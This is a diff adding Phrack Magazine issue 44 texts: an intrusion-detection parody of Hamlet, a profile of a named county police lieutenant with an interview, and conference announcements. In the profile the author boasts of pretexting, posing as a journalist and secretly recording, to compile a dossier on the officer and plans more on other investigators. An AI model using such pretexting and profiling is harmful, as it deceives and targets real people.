+Mitnick's Soliloquy
+
+Intruder, or not Intruder: that is the question:
+Whether 'tis more likely the system suffers
+The misuses and malfeasances of outrageous crackers
+Or that some user behaves anomalously
+And, by so doing, causes false alarms.  To alert, to audit;
+No more; and by an audit to say we find the attack,
+And the thousand failed login attempts
+That are seen on the network, 'tis a consummation
+Devoutly to be decrypted.  To alert, to audit.
+To audit, perchance to detect, ay, there's the rub.
+For in that detection of attack what false alarms may come;
+When we have dumped a million packets
+Must give us pause, the analysis
+That makes use of long CPU hours and many gigabytes
+For who would bear the whips and scorns of time
+The analysis by hand, the tired SSOs eyes sore,
+The pangs of innocent users, the law's delay,
+The insolence of phreaks, and the spurns
+That patient merit of unworthy takes
+When he himself might his quietus make
+By a disconnected ethernet?  who would fardles bear
+To grunt and sweat under C2 standards
+But that the dread of worm after worm
+The undiscovered bug from whose bourn
+No Vandal turns, puzzles the testers,
+And makes us rather ebar those ills we have
+That crash the system and erase the hard drive?
+Thus intrusion detection makes abusers of us all,
+And thus the native hue of normal use
+Is sicklied over with the red light of intruder,
+and jobs of great size and duration
+With this regard their patterns out of normal parameters,
+and lose the name of legal system policy.
+
+				After Hamlet's Soliloquy,
+				By JJ
+
+*******************************************************************************
diff --git a/phrack44/5.txt b/phrack44/5.txt
new file mode 100644
index 0000000..033b241
--- /dev/null
+++ b/phrack44/5.txt
@@ -0,0 +1,461 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 5 of 27
+
+****************************************************************************
+
+                             Computer Cop Prophile
+
+                                by The Grimmace
+
+
+
+    The following file is something I thought of and did
+a LOT of research on before writing.  It's something that
+I haven't seen in PHRACK and I've been a devout fan of
+this zine since the beginning.
+
+    The "PHRACK PROPHILES" on hackers and phreakers give
+readers an insight into the movers and shakers of the P/H
+world, but how about a profile or profiles on the
+anti-hacker/phreaker establishment that seems to be
+growing by leaps and bounds lately?
+
+ In the past years we've seen cops and feds who know
+nothing about computers and/or telephone systems bungle their
+way through search warrants and arrests and have had some good
+laughs at their expense.  But now it seems that the "computer
+cops", the feds especially, are putting a big push on training
+agents in the "tricks of the trade" and their conviction rate
+is getting better.
+
+ The primary source of this training is the Federal Law
+Enforcement Training Center in Glynco, Georgia, where they're
+teaching computer seizure and analysis techniques,
+computer-targeted search warrants, and telecommunications fraud
+investigations.  (They're very accommodating about giving out
+information on the phone as long as you tell them you're a
+cop).  The FBI Academy in Quantico also has a computer crimes
+course.
+
+    On the technical side of things, there's an organization
+called IACIS which stands for the International Association
+of Computer Investigative Specialists based in Portland,
+Oregon, and which consists of members of both local law
+enforcement agencies nationwide as well as various and
+sundry federal agencies.  This group teaches and certifies
+cops in how to get evidence from computer systems that can't be
+attacked in court (Of course, anything CAN be attacked, but
+getting the evidence squashed is not always a sure thing unless
+the judge is a computerphobe).
+
+ As much satisfaction as we've gained at the expense of
+the US Secret Service from the Steve Jackson Games case, it's
+widely publicized problems may prove to be a double-edged sword
+hanging over our heads.  Law enforcement learned a LOT of lessons
+from mistakes made in that investigation.
+
+    Like most of you, I've spent a lot of years
+exploring computer systems (usually those belonging to others)
+and personally feel that I've done nothing wrong (know the
+feeling?).  I'm sure others across the country also can
+conduct a little socially-engineered reconnaissance and
+get the lowdown on some of the people we NEVER want to see
+knocking on our doors with a sledge hammer in the middle of the
+night.
+
+    This profile contains information on the ONLY computer
+crime cop I could identify in the Louisville/Jefferson County
+area after calling all the major departments posing as a writer
+for a law enforcement magazine doing a survey.  Information
+about him was obtained not only from his department, but from
+sources in the local and federal court systems, Ma Bell
+Security, and the Federal Law Enforcement Training Center.  Lt.
+Baker is *not* a potential donor to the CPSR or EFF to say the
+least.
+
+ I'm currently compiling similar information on other
+law enforcement types in the Secret Service, Columbus Ohio PD,
+Dallas PD, Georgia Bureau of Investigation and members of Ma
+Bell's Data Security Group in Atlanta. Baker was just the
+closest to me so I started with him.  If I can get the
+information I've requested, then future submissions will
+also include lesson plans furnished by FLETC on their training
+courses and analysis protocols suggested by the USSS...heh...heh.
+
+Yours,
+
+The Grimmace
+
+
+   *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
+                          COMPUTER-COP PROFILE I
+
+                              LT. BILL BAKER
+
+                    JEFFERSON COUNTY POLICE DEPARTMENT
+                           LOUISVILLE, KENTUCKY
+
+
+                         INFORMATION COMPILED BY:
+
+                            ** THE GRIMMACE **
+
+   *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
+
+
+       NAME:  Bill Baker
+       RANK:  Lieutenant
+
+               AGENCY:    Jefferson County Police Department
+                         768 Barret Ave.
+                         Louisville, Kentucky  40204
+
+                   AGE:     43
+ YEARS OF COMPUTER EXP:     13
+
+        YEARS AS A COP:     18
+    YEARS IN COMPUTER/
+         TELECOM CRIME:      8
+
+              TRAINING:  Federal Law Enforcement Training Ctr.
+                                Glynco, Ga.
+                      - Telecommunications Crime
+                          Telecom Fraud
+                          Cellular Fraud
+                          PBX Fraud
+                      - Computer Crime
+                            Illegal Access Crimes
+                            Computer Crime Inves.
+                            Seized System Analysis
+
+                 FBI Academy
+                 Quantico, Va.
+                      - Computers in Narcotics Investigations
+                      - Computer Crime Investigations
+
+                 National Intelligence Academy
+                 Ft. Lauderdale, Fl.
+                      - Supervising Intelligence Operations
+                            Surveillance Techniques
+                            Electronic Tracking
+                            Electronic Eavesdroping
+                            Video Evidence Techniques
+                      - Telephone Systems
+                            Wiretaps
+                            Dialed Number Recorders
+                            Pager/Fax Intercepts
+                            Technical Telephony Course
+
+  PREVIOUS ASSIGNMENTS:  Patrol
+                            Criminal Investigations/Burglary
+                            Criminal Investigations/Homicide
+                            Crime Prevention
+                            Special Investigations/Vice-Intel
+
+    MEMBER:  Communications Fraud Control Association
+                    Washington, D.C.
+
+  PUBLICATIONS:     Various computer/telecommunications
+             crime oriented articles for assorted
+             law enforcement and computer industry
+             magazines (i.e., POLICE CHIEF, DATA TODAY)
+
+
+ Posing as a freelance writer from the "Law Enforcement
+Journal", I made calls to local police agencies all over this
+area asking about their Computer Crime Units and received
+replies ranging from "What are you talking about?" to "Maybe
+FRAUD handles that...hey, Charlie...do the FRAUD guys do
+anything with compoooters?".  So much for the Louisville
+Division of Police...no fear there, right?
+
+ But I decided to push on since Louisville, though not a
+hotbed of phreakers/hackers, IS the latest home of TAP MAGAZINE
+(a la Blitzkrieg BBS and the Predat0r) and has a smattering of
+"hometown" folks engaged in less than legal activities through
+the local phone lines.
+
+ The call made to the Jefferson County Police got me a
+solid response of "You'll have to talk to Lt. Bill Baker.  Hey,
+Charlie, where's Lt. Baker working now?" (This guy is so low
+key his own department doesn't even know where he works!) They
+finally decide he's someplace called "Adam Station" and
+through "various" contacts and a friendly local attorney who
+rarely pays for telephone calls himself, I managed to obtain
+quite a bit of information about Lt. Baker and his obviously
+misguided quest.
+
+ Lt. Baker is fairly typical of the "new breed" of
+high-tech investigator currently being churned out by the
+various federal training schools.  He's aggressive and, from
+talking to other members of his department, thought of as a
+"computer weenie" who was probably a hacker himself before he
+embraced the "dark side" of "the FORCE". (I personally believe
+that this may be more fact than fantasy after talking to him on
+the phone since he seems to know more about phreaking and
+hacking than one would think would be taught in the
+aforementioned federal institutes of higher learning.)
+
+ I finally managed to speak with Lt. Baker on the phone
+and gave him my "writing about computer crime" rap which he
+bought with little suspicion.  The following are excerpts from
+the recording I made of the conversation [comments in brackets
+are mine]:
+
+TG:     How would you rate the progress of computer and
+        telecommunications crime investigations in this area?
+
+Baker:  There have been some good cases made here, but there's
+        still a long way to go.  The main problem is that there
+        hasn't been a push from local businesses in this area to combat
+        these types of crimes.  Most of'em don't want to admit they've
+        been hit from the outside.  If there's no complaints,
+        then the departments aren't likely to want to spend the money
+        to dig up additional crime, right?
+
+TG:     Of the hackers you've worked on, what kind of capabilities
+        do they have and how good do you think they are?
+
+Baker:  Well, hackers and phreaks are like any other cross-section
+        of a criminal group...there are some that are very good
+        and some that are pitiful.  The best thing you can say
+        about working hacker/phreaker cases is that a lot of them
+        catch themselves.  They have huge egos and tend to brag
+        a good deal about what they've done and how they did it.
+
+TG:     Does that mean that you don't think a computer crime
+        investigator has to be as good as the criminals
+        he chases...I mean, because a lot of these people leave
+        so many clues behind?  How would you rate your ability
+        in this field?
+
+Baker:  Nope...not at all.  I think that as technology gets better
+        so will the crooks. Let's keep the record straight here.
+        Sure, there are bozos out there who read a how-to file in
+        an old PHRACK and decide that they have the knowledge
+        they need to nuke the phone company or ride a VAX like
+        a Hell's Angel rides a Harley.  Those are the easy ones.
+        The ones who -write- [author's emphasis] the technical
+        articles in PHRACK are the ones to worry about.  There
+        are some stomp-down [??] incredibly knowledgeable
+        individuals in circulation blasting away with their modems
+        at any target of opportunity.
+
+TG:     You didn't mention your own ability for investigating
+        these people.
+
+Baker:  (Laughs) Yeah, well...let's say I know enough to get by
+        and am smart enough to know that there are no absolute
+        experts.
+
+TG:     How would you comment on the Steve Jackson Games case?
+        Do you think the Secret Service set a lot of bad
+        precedents?
+
+Baker:  (Laughs) Noooooooo....sorry, pal.  That's been jawed to death
+        in every phreak/hack mag, legal journal, and Internet
+        newsgroup in existence and I'm not about to stick my
+        neck out on that one, OK?  I will say that everyone learned
+        a lot from that case and I seriously doubt if you'll see the
+        same set of problems reoccurring in future cases.  Maybe
+        the CSPR or EFF hired guns can come up with a new group
+        of loopholes, in which case we'll have to find new ways
+        to circumvent those attacks.
+
+TG:     You sound a little critical of the EFF and CSPR efforts
+        in their defense of so-called "computer criminals".
+
+Baker:  Well, I'm sure that they believe in what they're doing.
+        They must to invest that much cash and energy.  But I
+        think there has to be some middle ground agreed upon
+        rather than just whining about "all information should
+        be free" and "if I can get into your system then I should
+        be allowed to look around".  I'm not going to launch into
+        a diatribe on organizations that I don't agree with. I'm
+        simply going to work harder at dotting every "i" and
+        crossing every "t" to make my cases more secure.  Stealing
+        telephone service is a crime, defrauding businesses is a
+        crime, gaining unauthorized access into someone else's
+        computer system is, in most states, a crime, and even if
+        there's no law on the books making it a crime, it's
+        wrong.
+
+TG:     Since by your own statement, you feel that high-tech
+        crime investigation is still in its infancy, what groups
+        or organizations would you say are in the lead in trying
+        to combat this type of crime?
+
+Baker:  The most significant two I know are the Federal Law
+        Enforcement Training Center in Glynco, Georgia, and the
+        Communications Fraud Control Association based out of
+        Washington, D.C.  FLETC [he pronounces it FLET-SEE]
+        probably has the finest computer crimes training program
+        in the country.  They bring in acknowledged experts and
+        don't cut the students any slack as far as learning to
+        do things correctly and, most importantly, legally. The
+        CFCA is the leader in Telecommunications security and
+        provide training and assistance to telecom and computer
+        companies along with law enforcement agencies all over
+        the country.
+
+TG:     Why do you think so few law enforcement agencies know
+        anything about computer crime investigations?  Are they
+        going to leave the phreaks to the feds?
+
+Baker:  Nah...I don't think you can simplify it that easily.
+        Most departments don't have dedicated computer crime units
+        because of lack of funds to support such a unit, lack of
+        trained personnel, lack of understanding of the magnitude
+        of the problem, fear of increasing their crime stats or
+        any combination of those reasons.  When I first got into
+        this, there weren't any experts.  John Maxfield and his
+        BOARDSCAN operation got a lot of talk in the hack/phreak
+        journals and there were a small handful of others, but
+        no real standout authorities. I talked to an awful lot
+        of people before I hooked up with Clo Fleming at SPRINT
+        Security who helped me a lot.
+
+TG:     Do you still trade information with SPRINT?
+
+Baker:  I have contacts with all the major telecom carriers.
+        The training I got at FLETC really helped make some valuable
+        contacts.  But I guess SPRINT and Clo Fleming would be
+        my first choice simply because they were willing to help
+        me when no one else would.  You can't operate in this
+        environment without contacts in the OCC's.  It can't be
+        done and the OCC's [Other Common Carriers] are a lot
+        more willing to assist law enforcement now than they
+        were in 1985.  Of course, the telecommunications industry
+        is taking a $4-5 billion hit a year from fraud and that
+        has a lot to do with it.
+
+TG:     Do you subscribe to the hacker/phreaker magazines?
+
+Baker:  Sure...I subscribe to 2600 and get copies of some
+        others.  I think PHRACK's probably the best overall,
+        but I can't afford the subscription rate they've imposed
+        on government agencies since Craig Neidorf took the hit
+        for publishing the "golden" E911 document. I've learned
+        a ton of stuff over the years from PHRACK and wish it
+        were still free, but they have a right to their info
+        just like the people who own the systems attacked by
+        hackers.  It'd be kind of hypocritical for me to rip off
+        PHRACK and then turn and prosecute some other guy for
+        ripping off information from another source, right?
+
+TG:     What problems do you foresee in the future in computer
+        and telecom crime investigations?
+
+Baker:  Jeez...why don't you ask me when we'll have world peace
+        or something easy? OK, I think we'll probably see the
+        larger departments being forced to play catch-up with
+        the current trends and always being a little behind in
+        this area.  I also think you'll see more officers losing
+        cases and being sued, a la SJG, until they get the
+        specific training required to handle these cases the
+        right way.  Turning seized systems over to the local
+        "computer guy" in the department is going to cost'em in
+        the long run because every lawyer who gets one of these
+        cases is going to compare it bit by bit with the SJG
+        case to see if there's anything there he can use for
+        his client's defense.
+
+TG:     There has been a lot of discussion about whether or not
+        computer systems should be seized rather than just
+        making copies of the data for evidence.  What is your
+        policy on equipment seizures when working cases like
+        this?
+
+Baker:  First of all, I don't go on fishing expeditions with
+        search warrants. If I have enough to convict a guy then
+        I get the warrant.  I take everything that's there and
+        do the analysis.  I've had cases where the defendant has
+        requested copies of data he needed for various reasons
+        and I've had no problems with furnishing them as long
+        as the request is reasonable.  I ask for forfeiture of
+        the equipment if I can link it to the crime because the
+        law says I can.  If I can't link the computers, then I
+        give them back...simple as that.  I think it's kind of
+        interesting that most hackers or phreaks will refuse to
+        take a guilty plea for a reduced charge, even if I have
+        them stone cold and they're looking at a 99.999999%
+        chance of conviction in a jury trial, if it means
+        they'll lose their equipment in the deal.  It makes good
+        leverage in certain situations.
+
+TG:     Did you have any part in Operation Sun-Devil?
+
+Baker:  Nope.  Though I'd have liked to.  I was on a lot of the
+        systems taken down in Sun-Devil.
+
+TG:     You said you were on some of the systems busted in the
+        Sun-Devil operation, are you still on phreak/hack
+        boards and would you name any?
+
+Baker:  (Laughs a lot) I think I'll pass on naming systems I'm
+        on, OK?  That'd be cheating. (Laughs again)  But I get
+        around enough to know what's going on.  There are lots
+        of investigators out there calling the boards.
+
+TG:     I appreciate your time, Lt. Baker, and would like to ask
+        one last question.  What motivates you in these cases
+        since the alleged "theft" involves pretty intangible
+        property?
+
+Baker:  Motivation? Hmmmm...I suppose you could say it's the
+        chase that motivates me more than the catch, though
+        the catch is pretty good, too.  These cases tend to
+        be more one-on-one than some other types and the
+        adversaries can be very good at covering their tracks.
+        Hell, I probably have more in common with the people
+        I target than they'd like to believe.  As for the
+        "intangibility" of the stolen goods, well, that's why
+        we have court systems, isn't it...to define those
+        little details.
+
+TG:     A lot of computer crime investigators would rather stay
+        in the background, but you don't seem to have taken that
+        position.  Why not?
+
+Baker:  Well, like anyone involved in anything relatively new,
+        as opposed to the old standard type crimes like murder
+        and armed robbery, it's to my benefit to have anything
+        printed informing people of the problems created by
+        this type of activity.  We all pay the price for telecom
+        fraud, credit card fraud, data loss due to illegal
+        access to computers and all the rest.  But the people
+        involved in these crimes, for the most part, don't
+        exhibit the same profiles as the so-called "violent"
+        criminals.  In fact, I've had some very friendly
+        conversations with a number of phreaks and hackers.
+        Investigators who have problems would probably have
+        them no matter what crimes they were investigating.
+        I never assume that I'm smarter than anyone I'm
+        chasing and I don't rub their noses in it when I make
+        a case.  Just like I don't lose sleep when I just can't
+        seem to get that last piece of the puzzle and one gets
+        away.  It's hide-and-seek in cyberspace.  Pretty good
+        game, actually.
+
+For what it's worth, there it is.  The interview printed here
+doesn't contain a lot of the bullshit that was thrown back and
+forth during our conversation, just the relevant details which
+tend to give an insight into this guy.
+
+Frankly, I was impressed by the fact that he didn't seem
+anything like I had expected after reading horror stories about
+other agencies and investigators.  This guy was personable and
+maybe that's an indicator that he's dangerous. Never, ever
+underestimate your opponents -- even if they do sound like
+"good ole boys" and talk to you like you're the best friend
+they ever had.  Always remember that COPS INVENTED SOCIAL
+ENGINEERING!
+
+My next "computer cop" profile will deal with a rising star in
+the U.S. Secret Service and his connections to the Guidry
+Group, a consulting organization working for the cellular phone
+industry in combating cellular fraud.
+
+
+ 
diff --git a/phrack44/6.txt b/phrack44/6.txt
new file mode 100644
index 0000000..d86ec5d
--- /dev/null
+++ b/phrack44/6.txt
@@ -0,0 +1,1146 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 6 of 27
+
+                                Conference News
+
+                                     Part I
+
+
+****************************************************************************
+
+             [Official Announcement / Call For Participation]
+                          (Distribute Freely)
+
+
+
+  dFx, Phrack Magazine and cDc - Cult Of The Dead Cow proudly present :
+
+
+                            The Fourth Annual
+
+
+                              H O H O C O N
+
+
+                       "Cliff Stoll My K0DEZ!@$#!"
+
+
+Who:   All Hackers, Journalists, Security Personnel, Federal Agents,
+       Lawyers, Authors, Cypherpunks, Virtual Realists, Modem Geeks,
+       Telco Employees, and Other Interested Parties.
+
+
+Where:        Austin North Hilton & Towers and Super 8 Motel
+                        6000 Middle Fiskville Road
+                           Austin, Texas  78752
+                                  U.S.A.
+                 Hilton : (800) 347-0330 / (512) 451-5757
+                 Super 8: (800) 800-8000 / (512) 467-8163
+
+
+When:      Friday December 17 through Sunday December 19, 1993
+
+
+
+                             What is HoHoCon?
+                             ----------------
+
+HoHoCon is the largest annual gathering of those in, related to, or
+wishing to know more about the computer underground. Attendees generally
+include some of the most notable members of the "hacking" and "telecom"
+community, journalists, authors, security professionals, lawyers, and a
+host of others. Previous speakers include John Draper (Cap'n Crunch), Ray
+Kaplan, Chris Goggans (Erik Bloodaxe), Bruce Sterling, and many more. The
+conference is also one of the very few that is completely open to the
+public and we encourage anyone who is interested to attend.
+
+
+                            Hotel Information
+                            -----------------
+
+The Austin North Hilton recently split its complex into two separate
+hotels; the Hilton and the newly added Super 8. HoHoCon guests have the
+choice of staying in either hotel. Group rates are as followed :
+
+Super 8: Single - $46.50, Double - $49.50, Triple - $52.50, Quad - $55.50
+Hilton : Single - $69.00, Double - $79.00, Triple - $89.00, Quad - $99.00
+
+Once again, the hotel has set aside a block of rooms for the conference
+and we recommend making your reservations as early as possible to
+guarantee a room within the block, if not to just guarantee a room period.
+Rooms for the handicapped are available upon request. To make your
+reservations, call the number listed above that corresponds with where
+you are and where you want to stay and make sure you tell them you are
+with the HoHoCon conference or else you'll end up throwing more money
+away. The hotel accepts American Express, Visa, Master Card, Discover,
+Diner's Club, and Carte Blanche credit cards.
+
+Check-in is 3:00 p.m. and check-out is 12:00 noon. Earlier check-in is
+available if there are unoccupied rooms available. Please note that in
+order for the hotel to hold a room past 6:00 p.m. on the date of arrival,
+the individual reservation must be secured by a deposit or guaranteed
+with one of the credit cards listed above. Also, any cancellations of
+guaranteed reservations must be made prior to 6:00 p.m. on the date of
+arrival. You will be responsible for full payment of any guaranteed
+reservations which are not cancelled by this time.
+
+The hotel provides transportation to and from the airport and will give
+you full information when you make your reservations.
+
+
+                                Directions
+                                ----------
+
+For those of you who will be driving to the conference, the following
+is a list of directions provided by the hotel (so, if they're wrong,
+don't blame me):
+
+Dallas : Take IH 35 south to exit 238-B, the Houston exit. At the first
+         stop light, turn right on to 2222. Turn off of 2222 onto Clayton
+         Lane (by the Greyhound Station). At the stop sign, turn right
+         onto Middle Fiskville, the hotel is on the left.
+
+San Antonio : Take IH 35 north to exit 238-B, the Houston exit. At the
+              second stop light, turn left onto 2222. Turn off 2222 onto
+              Clayton Lane (by the Greyhound Station). At the stop sign,
+              turn right onto Middle Fiskville, the hotel is on the left.
+
+Houston (on 290) : Take 290 west into Austin. Exit off of 290 at the IH35
+                   exit (do not get on 35). Stay on the access road
+                   heading west, you will pass two stop lights. Turn off
+                   the access road onto Clayton Lane (by the Greyhound
+                   Station). At the stop sign, turn right onto Middle
+                   Fiskville, the hotel is on the left.
+
+Houston (on 71) : Take 71 west into Austin. Exit onto 183 north. Take
+                  183 north to 290 west. Take 290 west to the IH 35 exit.
+                  Exit off of 290 at the IH 35 exit (do not get on 35).
+                  Stay on the access road heading west, you will pass two
+                  stop lights. Turn off the access road onto Clayton Lane
+                  (by the Greyhound Station). At the stop sign, turn
+                  right onto Middle Fiskville, the hotel in on the left.
+
+Airport : Exit the airport parking lot and turn right onto Manor Road.
+          Take Manor Road to Airport Boulevard and turn right. Take
+          Airport Boulevard to IH 35 north. Take IH 35 to exit 238-B. At
+          the second stop light, turn left onto 2222. Turn off of 2222
+          onto Clayton Lane (by the Greyhound Station). At the stop sign,
+          turn right onto Middle Fiskville, the hotel is on the left.
+
+Call the hotel if these directions aren't complete enough or if you need
+additional information.
+
+
+                            Conference Details
+                            __________________
+
+HoHoCon will last 3 days, with the actual conference being held on
+Saturday, December 18 starting at 11:00 a.m. and continuing until 5 p.m.
+or earlier depending on the number of speakers. Although a few speakers
+have confirmed their attendance, we are still in the planning stages and
+will wait until the next update to release a speaking schedule. We welcome
+any speaker or topic recommendations you might have (except for, say, "Why
+I Luv Baked Potatos On A Stik!"), or, if you would like to speak yourself,
+please contact us as soon as possible and let us know who you are, who you
+represent (if anyone), the topic you wish to speak on, a rough estimate of
+how long you will need, and whether or not you will be needing any
+audio-visual aids.
+
+We would like to have people bring interesting items and videos again this
+year. If you have anything you think people would enjoy having the chance
+to see, please let us know ahead of time, and tell us if you will need any
+help getting it to the conference. If all else fails, just bring it to the
+con and give it to us when you arrive. Any organization or individual that
+wants to bring flyers to distribute during the conference may do so. You
+may also send your flyers to us ahead of time if you can not make it to
+the conference and we will distribute them for you. Left over flyers are
+included with information packets and orders that we send out, so if you
+want to send extras, go ahead.
+
+
+                                   Cost
+                                   ----
+
+Unlike smaller, less informative conferences, we do not ask you to shell
+out hundreds of dollars just to get in the door, nor do we take your money
+and then make you sleep in a tent. We are maintaining the motto of "give
+$5 if you can", but due to the incredibly high conference room rate this
+year, we may step up to "$5 minimum required donation" or "give us $5 or
+we'll smash your head in". Five dollars is an outrageously low price
+compared to the suit infested industry conferences or even the new "Cons
+are k00l and trendy, I gotta do one too!" conferences that are charging
+up to $50 for admission alone.
+
+To encourage people to donate, we will once again be having our wonderless
+"Raffle For The Elite" during the conference. We will issue a prize list
+in a future update, but we can guarantee that this year there will be a
+lot more (and better) prizes than last year, including a full system (and,
+no, it's not a c64 or 286). Anyone who wishes to donate worthwhile items
+to the raffle, please let us know ahead of time, or if it's a last minute
+acquirement, just bring it to the conference.
+
+
+                           Miscellaneous Notes
+                           -------------------
+
+To save myself some time by mailing responses to a lot of the same
+questions I expect to get, I'll answer a few of them here.
+
+Although I have not talked to him myself yet, Steve Ryan has told me that
+Bruce Sterling will indeed be in attendance and may say a few words.
+
+As far as I know, there will not be any visitors from any other planets
+at the conference. Scot Chasin is still on Earth and will be making an
+appearance.
+
+Video cameras will *not* be allowed inside the conference room without
+prior consent due to previous agreements made with speakers who do not
+wish for certain parts of their speech to be rebroadcast. Still cameras
+and Etch-A-Sketch's are fine and tape recorders are too easily hidden
+for us to be able to control.
+
+Videos and T-Shirts from last year's conference are still available, and
+will also be on hand during the conference. We do not handle the LoD World
+Tour shirts, but I can tell you that the old ones are gone and a
+*new* LoD shirt will be unveiled at the conference. The HoHoCon shirts are
+$15 plus $3 shipping ($4.00 for two shirts). At this time, they only come
+in extra large. We may add additional sizes if there is a demand for them.
+The front of the shirt has the following in a white strip across the
+chest:
+
+                               I LOVE FEDS
+
+      (Where LOVE = a red heart, very similar to the I LOVE NY logo)
+
+
+                          And this on the back:
+
+                            dFx & cDc Present
+
+                               HOHOCON '92
+
+                              December 18-20
+                              Allen Park Inn
+                              Houston, Texas
+
+
+   There is another version of the shirt available with the following:
+
+                               I LOVE WAREZ
+
+
+The video includes footage from all three days, is six hours long and
+costs $18 plus $3 shipping ($4.00 if purchasing another item also). Please
+note that if you are purchasing multiple items, you only need to pay one
+shipping charge of $4.00, not a charge for each item. If you wish to send
+an order in now, make all checks or money orders payable to O.I.S.,
+include your phone number and mail it to the street address listed below.
+Allow a few weeks for arrival.
+
+There will be new HoHoCon '93 shirts available at the conference and a
+video of the festivities will be out early next year.
+
+
+                              Correspondence
+                              --------------
+
+If anyone requires any additional information, needs to ask any questions,
+wants to RSVP, wants to order anything, or would like to be added to the
+mailing list to receive the HoHoCon updates, you may mail us at:
+
+
+                            hohocon@cypher.com
+                           drunkfux@cypher.com
+                              cDc@cypher.com
+                          drunkfux@crimelab.com
+                           dfx@nuchat.sccsi.com
+                         drunkfux@5285 (WWIV Net)
+
+                           or via sluggo mail at:
+
+                                 HoHoCon
+                            1310 Tulane, Box 2
+                              Houston, Texas
+                                77008-4106
+
+
+We also have a VMB which includes all the conference information and is
+probably the fastest way to get updated reports. The number is:
+
+                               713-867-9544
+
+You can download any of the conference announcements and related
+materials by calling Metalland Southwest at 713-468-5802, which is the
+offical HoHoCon BBS. The board is up 24 hours a day and all baud rates
+are supported.
+
+Those of you with net access can ftp to cypher.com and find all the
+HoHoCon information available in /pub/hohocon. The .gifs from previous
+cons are *not* currently online.
+
+Conference information and updates will most likely also be found in most
+computer underground related publications and mailing lists, including
+CuD, CSP, Mondo 2000, 2600, Phrack, TUC, phn0rd, cypherpunks, etc. They
+should also appear in a number of newsgroups including comp.dcom.telecom,
+alt.security, comp.org.eff.talk, and sci.crypt. We completely encourage
+people to use, reprint, and distribute any information in this file.
+
+
+     Same stupid ending statement from last year to make us look good
+     ----------------------------------------------------------------
+
+HoHoCon '93 will be a priceless learning experience for professionals and
+gives journalists a chance to gather information and ideas direct from the
+source. It is also one of the very few times when all the members of the
+computer underground can come together for a realistic purpose. We urge
+people not to miss out on an event of this caliber, which doesn't happen
+very often. If you've ever wanted to meet some of the most famous people
+from the hacking community, this may be your one and only chance. Don't
+wait to read about it in all the magazines and then wish you had been
+there, make your plans to attend now! Be a part of what we hope to be our
+largest and greatest conference ever.
+
+-------------------------------------------------------------------------------
+
+
+              COMPUTERS, FREEDOM, AND PRIVACY '94
+                    Conference Announcement
+            Scholarships, Writing Competition Notice
+                 23-26 March 1994, Chicago, Il.
+
+     The fourth annual conference, "Computers, Freedom, and
+Privacy," (CFP'94) will be held in Chicago, Il., March 23-26, 1994.
+The conference is hosted by The John Marshall Law School; George B.
+Trubow, professor of law and director of the Center for Informatics
+Law at John Marshall, is general chair of the conference.  The
+program is sponsored jointly by these Association for Computing
+Machinery (ACM) Special Interest Groups: Communications (SIGCOMM);
+Computers and Society (SIGCAS); Security, Audit and Control
+(SIGSAC).
+
+     The advance of computer and communications technologies holds
+great promise for individuals and society.  From conveniences for
+consumers and efficiencies in commerce to improved public health
+and safety and increased participation in government and community,
+these technologies  are fundamentally transforming our environment
+and our lives.
+
+     At the same time, these technologies present challenges to the
+idea of a free and open society.  Personal privacy and corporate
+security is at risk from invasions by high-tech surveillance and
+monitoring; a myriad of personal information data bases expose
+private life to constant scrutiny; new forms of illegal activity
+may threaten the traditional barriers between citizen and state and
+present new tests of Constitutional protection; geographic
+boundaries of state and nation may be recast by information
+exchange that knows no boundaries in global data networks.
+
+     CFP'94 will assemble experts, advocates and interest groups
+from diverse perspectives and disciplines to consider freedom and
+privacy in today's "information society.  Tutorials will be offered
+on March 23, 1994, from 9:00 a.m. - noon and 2:00 - 500 p.m. The
+conference program is Thursday, March 24, through Saturday, March
+26, 1994, and will examine the potential benefits and burdens of
+new information and communications technologies and consider ways
+in which society can enjoy the benefits while minimizing negative
+implications.
+
+                    STUDENT PAPER COMPETITION
+
+     Full time college or graduate students may enter the student
+paper competition.  Papers must not exceed 3000 words and should
+address the impact of computer and telecommunications technologies
+on freedom and privacy in society.  Winners will receive financial
+support to attend the conference and present their papers.  All
+papers should be submitted by December 15, 1993, (either as
+straight text via e-mail or 6 printed copies) to: Prof. Eugene
+Spafford, Department of Computer Science, Purdue University, West
+Lafeyette, IN 47907-2004.  E-Mail: spaf@cs.purdue.edu; Voice:
+317-494-7825
+
+
+               CONFERENCE REGISTRATION INFORMATION
+
+     Registration fees are as follows:
+     If paid by:    1/31/94   3/15/94   4/23/94
+                     Early    Regular    Late
+
+       Tutorial      $145      $175      $210
+       Conference     315       370       420
+
+NOTE: ACM members (give membership number) and John Marshall Alumni
+(give graduation date) receive a $10 discount from Tutorial and $15
+discount from Conference fees.
+
+CONFERENCE REGISTRATION: Inquiries regarding registration should be
+directed to RoseMarie Knight, Registration Chair, at the JMLS
+address above; her voice number is 312-987-1420;  E-mail,
+6rknight@jmls.edu.
+
+CONFERENCE INFORMATION: Communications regarding the conference
+should be sent to: CFP'94,  The John Marshall Law School, 315 S.
+Plymouth Ct., Chicago, IL 60604-3907
+(Voice: 312-987-1419; Fax: 312-427-8307; E-mail: CFP94@jmls.edu)
+
+ROOM RESERVATIONS: The Palmer House Hilton, located in Chicago's
+"loop," and only about a block from The John Marshall Law School,
+is the conference headquarters.  Room reservations only should be
+made directly with the hotel, mentioning "CFP'94" to get the
+special conference rate of $99.00, plus tax. (17 E. Monroe.,
+Chicago, Il., 60603, Tel: 312-726-7500;  1-800-HILTONS;  Fax
+312-263-2556)
+
+
+     NOTE: More specific information about conference program
+content will be available December 1, 1993.
+
+***********
+George B. Trubow, Professor of Law
+Director, Center for Informatics Law
+The John Marshall Law School
+315 S. Plymouth Ct.
+Chicago, IL 60604-3907
+Fax: 312-427-8307; Voice: 312-987-1445
+E-mail: 7trubow@jmls.edu
+
+......SCHOLARSHIPS
+
+The Conference on Computers, Freedom & Privacy (CFP'94) is pleased to
+announce that it will once again provide a number of full tuition
+scholarships for attendance at the conference. The conference will be held
+in Chicago, IL from March 23rd through March 26th, 1995 and will be hosted
+by the John Marshall Law School under the chairmanship of George Trubow.
+
+The conference traditionally attracts an extremely diverse group of
+persons concerned with issues relating to the rapid development of the
+"information society"; civil libertarians, information providers, law
